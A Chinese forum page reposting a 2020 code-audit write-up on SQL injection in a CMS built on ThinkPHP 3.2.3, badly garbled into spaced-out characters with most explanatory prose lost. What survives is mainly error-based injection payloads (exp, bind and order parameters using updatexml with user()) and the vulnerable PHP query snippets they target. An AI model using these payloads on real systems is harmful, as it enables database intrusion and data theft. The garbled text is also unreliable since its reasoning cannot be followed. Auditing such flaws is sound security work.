[15594] 2020-07-11_基于ThinkPHP的CMS审计思路

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2020-07-11_基于ThinkPHP的CMS审计思路 T h i n k P H P C M S d i o   F r e e B u f   2 0 2 0 - 0 7 - 1 1 y x t c m f 6 . 1 t h i n k p h p 3 . 2 . 3 c m s 1 9 3 c m s M V C t h i n k p h p 3 . 2 . 3 t p 3 . 2 . 3 S e a y A W V S p h p s t o r m S e a y p h p s t u d y A W V S 0 x 0 0  
u r l h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 1 4 / i n d e x . p h p / U s e r / L o g i n / i n d e x / a p p l i c a t i o n / U s e r / L o g i n C o n t r o l l e r . c l a s s . p h p i n d e x ( ) 0 x 0 1   t h i n k p h p 3 . 2 . 3 t p 3 . 2 . 3 t h i n k p h p 3 . 2 . 3 s q l
t p 3 . 2 . 3 s q l $ o p t i o n s q l 1 . - > w h e r e ( ) - > f i n d ( ) u s e r n a m e [ 0 ] = e x p & u s e r n a m e [ 1 ] = = a d m i n   a n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 3 a , ( u s e r ( ) ) ) , 1 ) % 2 3 $ w h e r e S t r s q l s q l I ( $ _ G E T [ u s e r n a m e ] ) e x p e x p   2 . - > f i n d / s e l e c t / d e l e t e ( ) i d [ w h e r e ] = 1   a n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , u s e r ( ) , 0 x 7 e ) , 1 )   % 2 3   s q l $ u s e r n a m e   =   $ _ G E T [ ' u s e r n a m e ' ] ; $ d a t a =   M ( ' u s e r s ' ) - > w h e r e ( a r r a y ( " u s e r n a m e " = > $ u s e r n a m e ) ) - > f i n d ( ) ; $ i d = I ( " i d " ) ; $ d a t a = M ( " u s e r s " ) - > f i n d ( $ i d ) ;
f i n d ( ) s e l e c t ( ) d e l e t e ( ) 3 . - > w h e r e ( ) - > s a v e ( ) u s e r n a m e [ 0 ] = b i n d & u s e r n a m e [ 1 ] = 0   a n d   ( u p d a t e x m l ( 1 , c o n c a t ( 0 x 3 a , ( u s e r ( ) ) ) , 1 ) ) % 2 3 & p a s s w o r d = 1 2 3 4 5 6 4 . - > o r d e r ( ) - > f i n d ( ) u s e r n a m e = a d m i n & o r d e r [ u p d a t e x m l ( 1 , c o n c a t ( 0 x 3 a , u s e r ( ) ) , 1 ) ] s q l t p 3 . 2 . 3 s q l s q l 0 x 0 2   s q l - > f i n d ( $ c o n d i t i o n [ " u s e r n a m e " ] = I ( " u s e r n a m e " ) ; $ d a t a [ " p a s s w o r d " ] = I ( " p a s s w o r d " ) ; $ r e s = M ( " u s e r s " ) - > w h e r e ( $ c o n d i t i o n ) - > s a v e ( $ d a t a ) ; $ u s e r n a m e = I ( " u s e r n a m e " ) ; $ o r d e r = I ( " o r d e r " ) ; $ d a t a = M ( " u s e r s " ) - > w h e r e ( a r r a y ( " u s e r n a m e " = > $ u s e r n a m e ) ) - > o r d e r ( $ o r d e r ) - > f i n d ( ) ;
1 . A d s q l w h e r e ( ) $ i d a d _ i d = $ i d s q l 便 s q l
2 . r e g i s t e r s q l $ w h e r e p a y l o a d 3 . l o g i n s q l
d o l o g i n ( ) p a y l o a d

w h e r e ( ) i n t f i n ( ) - > s e l e c t / d e l e t e (
s e l e c t / d e l e t e ( ) - > s a v e ( - > o r d e r ( o r d e r ( ) 0 x 0 3  
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则